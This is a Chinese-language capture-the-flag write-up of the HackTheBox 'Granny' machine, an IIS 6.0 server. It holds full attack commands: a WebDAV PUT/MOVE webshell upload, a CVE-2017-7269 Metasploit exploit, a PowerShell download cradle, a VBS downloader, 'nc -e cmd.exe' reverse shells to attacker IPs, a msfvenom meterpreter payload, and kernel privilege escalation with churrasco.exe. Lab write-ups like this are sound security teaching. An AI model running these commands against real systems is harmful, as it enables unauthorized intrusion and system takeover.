HTB靶场系列 Windows靶机 Granny靶机
时间:2022-12-22 23:00:00
勘探
还是使用nmap进行侦擦
先大致扫描
nmap 10.10.10.15 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-01 10:29 CST Nmap scan report for 10.10.10.15 Host is up (0.38s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 39.33 seconds只开了80端口,是纯的web站
然后仔细扫描
nmap -sCV 10.10.10.15 -p 80 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-01 10:32 CST Nmap scan report for 10.10.10.15 Host is up (0.71s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | Server Date: Sat, 01 Jan 2022 02:32:39 GMT | WebDAV type: Unknown | Server Type: Microsoft-IIS/6.0 |_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 40.55 seconds发现服务器是iis6.然后我们推测对方服务器系统的版本可能是win2003之前的系统
用dirsearch扫描敏感目录
python3.9 dirsearch.py -u http://10.10.10.15 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10977 Output File: /root/dirsearch/reports/10.10.10.15/_22-01-01_10-30-44.txt Error Log: /root/dirsearch/logs/errors-22-01-01_10-30-44.log Target: http://10.10.10.15/ [10:32:59] 301 - 153B - /_private -> http://10.10.10.15/_private/ [10:32:59] 200 - 246B - /_private/ [10:33:00] 301 - 155B - /_vti_bin -> http://10.10.10.15/_vti_bin/ [10:33:00] 200 - 759B - /_vti_bin/ [10:33:00] 200 - 195B - /_vti_bin/_vti_aut/author.dll [10:33:00] 200 - 96B - /_vti_bin/shtml.dll [10:33:00] 200 - 96B - /_vti_bin/shtml.exe?_vti_rpc [10:33:00] 200 - 106B - /_vti_bin/shtml.exe/qwertyuiop [10:33:00] 200 - 105B - /_vti_bin/shtml.dll/asdfghjkl [10:33:00] 200 - 246B - /_vti_log/ [10:33:00] 500 - 88B - /_vti_pvt/users.pwt [10:33:00] 301 - 155B - /_vti_log -> http://10.10.10.15/_vti_log/ [10:33:00] 500 - 88B - /_vti_pvt/users.pwd [10:33:01] 500 - 88B - /_vti_cnf/ [10:33:01] 200 - 2KB - /_vti_inf.html [10:33:01] 200 - 195B - /_vti_bin/_vti_adm/admin.dll [10:34:29] 200 - 369B - /aspnet_client/ [10:34:29] 301 - 158B - /aspnet_client -> http://10.10.10.15/aspnet_client/ [10:36:14] 200 - 242B - /images/ [10:36:14] 301 - 149B - /images -> http://10.10.10.15/images/ [10:37:47] 200 - 2KB - /postinfo.html Task Completed 我们在上面发现了一些iis6.0中间件,让我们搜索是否有相关漏洞
searchsploit IIS 6.0 ------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------- --------------------------------- Microsoft IIS 4.0/5.0/6.0 - Internal IP Ad | windows/remote/21057.txt Microsoft IIS 5.0/6.0 FTP Server (Windows | windows/remote/9541.pl Microsoft IIS 5.0/6.0 FTP Server - Stack E | windows/dos/9587.txt Microsoft IIS 6.0 - '/AUX / '.aspx' Remote | windows/dos/3965.pl Microsoft IIS 6.0 - ASP Stack Overflow Sta | windows/dos/15167.txt Microsoft IIS 6.0 - WebDAV 'ScStoragePathF | windows/remote/41738.py Microsoft IIS 6.0 - WebDAV Remote Authenti | windows/remote/8704.txt Microsoft IIS 6.0 - WebDAV Remote Authenti | windows/remote/8754.patch Microsoft IIS 6.0 - WebDAV Remote Authenti | windows/remote/8765.php Microsoft IIS 6.0 - WebDAV Remote Authenti | windows/remote/8806.pl Microsoft IIS 6.0/7.5 ( PHP) - Multiple V | windows/remote/19033.txt ------------------------------------------- --------------------------------- Shellcodes: No Results看到了关于IIS的webdav的漏洞
webdav作为类ftp必须上传文件共享协议,载读取之类的功能的
我们之前在nmap中勘探到,这个webdav支持相当多的方法
Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK那我们可以用davtest来测试一下这个webdav都可以上传和调用哪些文件
root@kali# davtest -url http://10.10.10.15
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: l8Qkwc
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_l8Qkwc
********************************************************
Sending test files
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jsp
PUT asp FAIL
PUT php SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.php
PUT cgi FAIL
PUT aspx FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.pl
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.cfm
PUT shtml FAIL
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jhtml
PUT html SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
********************************************************
Checking for test file execution
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
EXEC jsp FAIL
EXEC php FAIL
EXEC pl FAIL
EXEC cfm FAIL
EXEC jhtml FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_l8Qkwc
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jsp
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.php
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.pl
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.cfm
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.jhtml
PUT File: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html
Executes: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.txt
Executes: http://10.10.10.15/DavTestDir_l8Qkwc/davtest_l8Qkwc.html发现上传成功的只有txt和html
而这个脚本没有测试aspx文件的上传和利用,我们可以手动测试一下
root@kali# echo 1234 > test.txt
root@kali# curl -X PUT http://10.10.10.15/test.txt -d @test.txt
root@kali# curl http://10.10.10.15/df.txt
1234
root@kali# curl -X PUT http://10.10.10.15/test.aspx -d @test.txt
The page cannot be displayed
The page cannot be displayed
You have attempted to execute a CGI, ISAPI, or other executable program from a directory that does not allow programs to be executed.
Please try the following:
- Contact the Web site administrator if you believe this directory should allow execute access.
HTTP Error 403.1 - Forbidden: Execute access is denied.
Internet Information Services (IIS)
Technical Information (for support personnel)
- Go to Microsoft Product Support Services and perform a title search for the words HTTP and 403.
- Open IIS Help, which is accessible in IIS Manager (inetmgr),
and search for topics titled Configuring ISAPI Extensions, Configuring CGI Applications, Securing Your Site with Web Site Permissions, and About Custom Error Messages.
- In the IIS Software Development Kit (SDK) or at the MSDN Online Library, search for topics titled Developing ISAPI Extensions, ISAPI and CGI, and Debugging ISAPI Extensions and Filters.
发现了它拒绝了我们上传aspx文件的请求
但是之前我们看到,他是支持move方法的那么我们可不可以上传txt文件,然后把他改成aspx文件呢
root@kali# cp /usr/share/webshells/aspx/cmdasp.aspx .
root@kali# curl -X PUT http://10.10.10.15/cmdasp.txt -d @cmdasp.aspx
root@kali# curl -X MOVE -H 'Destination:http://10.10.10.15/cmdasp.aspx' http://10.10.10.15/cmdasp.txt
然后就发现成功了
也就是这个不可以上传aspx但可以执行
获取lakis用户权限
使用msf攻击
然后去百度一下发现许多有关cve-2017-7269的漏洞,那么尝试利用一下,cve-2017-7269
下载后放在msf的漏洞文件夹中
/usr/share/metasploit-framework/modules/exploits/windows/iis/
注意命名问题msf加载不了连字符 —
然后直接msf打通
打通之后会发现一个问题
stdapi_sys_config_getuid: Operation failed: Access is denied.
这个问题不知道原因只知道解决办法:
就是平常我们使用msf获得shell之后为了隐蔽进程会把shell合并进一个应用
转换pid
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Pr
ocess]
4 0 System
272 4 smss.exe
320 272 csrss.exe
344 272 winlogon.e
xe
392 344 services.e
xe
404 344 lsass.exe
580 392 svchost.ex
e
668 392 svchost.ex
e
732 392 svchost.ex
e
772 392 svchost.ex
e
788 392 svchost.ex
e
924 392 spoolsv.ex
e
952 392 msdtc.exe
1064 392 cisvc.exe
1112 392 svchost.ex
e
1168 392 inetinfo.e
xe
1204 392 svchost.ex
e
1316 392 VGAuthServ
ice.exe
1384 392 vmtoolsd.e
xe
1488 392 svchost.ex
e
1596 392 svchost.ex
e
1708 392 dllhost.ex
e
1768 392 dllhost.ex
e
1936 392 alg.exe
1964 580 wmiprvse.e x86 0 NT AUTHORITY\NET C:\WINDOWS\system
xe WORK SERVICE 32\wbem\wmiprvse.
exe
2096 392 vssvc.exe
2172 1488 w3wp.exe x86 0 NT AUTHORITY\NET c:\windows\system
WORK SERVICE 32\inetsrv\w3wp.e
xe
2240 580 davcdata.e x86 0 NT AUTHORITY\NET C:\WINDOWS\system
xe WORK SERVICE 32\inetsrv\davcda
ta.exe
2288 2172 calc.exe x86 0 C:\WINDOWS\system
32\calc.exe
2444 788 wmiadap.ex
e
2464 580 wmiprvse.e
xe
meterpreter > getpid
Current pid: 2288
meterpreter > migrate 2172
[*] Migrating from 2288 to 2172...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE这一步把shell进程和2172的w3wp.exe绑定,之后就可以正常操作了
手动
普通shell
我们之前在web界面已经注入了一个aspx文件作为命令执行界面,那么我们可以用这个界面直接转发出来一个shell或者是诸如一个aspx的木马,来获得一个msfshell
那么直接转发shell就在命令行中输入
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe+IEX(New-Object+Net.WebClient).downloadString('http://10.10.16.7/Invoke-PowerShellTcpOneLine.ps1')注意这样使用脚本之前,需要先用python打开本地的SimpleHTTPServer服务
python -m SimpleHTTPServer 80然后这个脚本来源于nishang的github)
但是发现执行失败了,为什么,可能是这个服务器里没有powershell那么咱们可以使用一种思路使用vb来调用wget来下载一个nc来转发shell,思路来源于Bro10)
创建一个vb脚本
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs然后调用获取在我们开了http服务的主机中的nc
cscript wget.vbs http://10.10.16.7/nc.exe nc.exe之后使用nc转发shell
nc -e cmd.exe 10.10.16.7 4444成功获得一个shell
msfshell
同样可以用改名字的方法上传一个msf的aspx小马上去来获得一个比较好用的回连shell
首先用msfvenom制作一个小马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=443 -f aspx > met.aspxroot@kali# curl -X PUT http://10.10.10.15/met.txt ---data-binary@met.aspx
root@kali# curl -X MOVE -H 'Destination: http://10.10.10.15/met.aspx' http://10.10.10.15/met.txt注意此时我选择了以二进制的方式来上传文件,如果还以post形式上传,会致使文件格式出错而导致小马执行失败
之后用msf打开监听模块执行脚本就好
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.14:443 执行脚本
curl http://10.10.10.15/met.aspx
[*] Sending stage (179779 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.14:443 -> 10.10.10.15:1032) at 2019-03-06 17:05:07 -0500
meterpreter >获得shell
获取root权限
使用msf
使用后渗透模块先将会话保存到后台
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/cve_17_7269) > search post/multi/recon/local_exploit_suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(windows/iis/cve_17_7269) > use 0这个模块是用来探查渗透系统有什么漏洞的
sessions 语句可以看到自己会话的id然后设计一下选项run就行
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this modu
le on
SHOWDESCRIPTION false yes Displays a detailed descript
ion for the available exploi
ts
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/win NT AUTHORITY\NETWORK 10.10.16.2:4444 -> 1
dows SERVICE @ GRANNY 0.10.10.15:1030 (10.
10.10.15)
msf6 post(multi/recon/local_exploit_suggester) > run查看结果
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 38 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed存在三个漏洞ms14058 ms14070 ms15051
use exploit/windows/local/ms14_058_track_popup_menu
msf6 exploit(windows/local/ms14_058_track_popup_menu) > show options
Module options (exploit/windows/local/ms14_058_track_popup_menu):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh,
thread, process, none)
LHOST 192.168.1.102 yes The listen address (an interface ma
y be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.16.2
lhost => 10.10.16.2
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Launching notepad to host the exploit...
[+] Process 2348 launched.
[*] Reflectively injecting the exploit DLL into 2348...
[*] Injecting exploit into 2348...
[*] Exploit injected. Injecting payload into 2348...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.16.2:4444 -> 10.10.10.15:1031) at 2022-01-01 15:06:34 +0800
meterpreter > dir
Listing: c:\windows\system32\inetsrv
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM手动
这种方法用于pwk或oscp考试中不可以使用msf的规则
用sysinfo来获取靶机信息然后复制粘贴到本地的一个txt文件中用wes进行分析
发现存在
ms09-012漏洞
此时可以安装sqlninja然后利用它自带的脚本/usr/share/sqlninja/apps/churrasco.exe进行一个提权
此时使用我们在上面编写的VB脚本来下载这个脚本
cscript wget.vbs http://10.10.14.42:8000/churrasco.exe churrasco.exe然后使用这个脚本利用nc转发shell
churrasco.exe -d "C:\temp\nc.exe -e cmd.exe 10.10.16.7 5555之后再攻击机上用nc接收就可以了
nc -lvnp 5555提权原理解释
After doing some research around the exploit the best resource was from Microsoft’s official disclosure website. To summarise in a simple and brief way the vulnerability first of all exists within the Microsoft Distributed Transaction Coordinator (MSDTC). The MSDTC leaves a
NetworkServicetoken that can be impersonated (meaning it will run with that tokens privileges and permissions) by any process that calls into it. Meaning the vulnerability allows a process that is not running under theNetworkServiceaccount but has theSeImpersonatePrivilegeto elevate it’s privilege and therefore execute code underNetworkServiceprivilege.
感谢
HTB Granny Writeup | Bros10提供的手动提权思路和在没有PS的情况下VB的思路
HTB: Granny | 0xdf hacks stuff提供的利用curl解决问题的思路
